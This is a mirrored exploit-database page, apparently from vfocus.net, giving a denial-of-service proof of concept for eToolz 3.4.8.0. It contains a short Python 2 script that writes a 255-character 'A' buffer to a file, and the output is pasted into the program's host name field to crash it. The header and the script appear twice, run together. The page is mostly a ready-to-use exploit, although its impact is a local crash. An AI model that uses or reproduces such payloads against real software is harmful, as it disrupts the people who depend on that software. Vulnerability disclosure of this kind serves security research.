eToolz 3.4.8.0 - Denial of Service (PoC)
|
来源:vfocus.net 作者:Sencan 发布时间:2018-11-07
|
|
# Exploit Title: eToolz 3.4.8.0 - Denial of Service (PoC) # Dork: N/A # Date: 2018-11-03 # Exploit Author: Ihsan Sencan # Vendor Homepage: https://www.gaijin.at # Software Link: https://www.gaijin.at/de/software/etoolz # Version: 3.4.8.0 # Category: Dos # Tested on: WiN7_x64/KaLiLinuX_x64 # CVE: N/A # POC: # 1) # Host name / IP adress : #!/usr/bin/python buffer = "A" * 255 payload = buffer try: f=open("exp.txt","w") print "[+] Creating %s bytes evil payload." %len(payload) f.write(payload) f.close() print "[+] File created!" except: print "File cannot be created."# Exploit Title: eToolz 3.4.8.0 - Denial of Service (PoC) # Dork: N/A # Date: 2018-11-03 # Exploit Author: Ihsan Sencan # Vendor Homepage: https://www.gaijin.at # Software Link: https://www.gaijin.at/de/software/etoolz # Version: 3.4.8.0 # Category: Dos # Tested on: WiN7_x64/KaLiLinuX_x64 # CVE: N/A # POC: # 1) # Host name / IP adress : #!/usr/bin/python buffer = "A" * 255 payload = buffer try: f=open("exp.txt","w") print "[+] Creating %s bytes evil payload." %len(payload) f.write(payload) f.close() print "[+] File created!" except: print "File cannot be created."
|
|
|
[推荐]
[评论(0条)]
[返回顶部] [打印本页]
[关闭窗口] |
|
|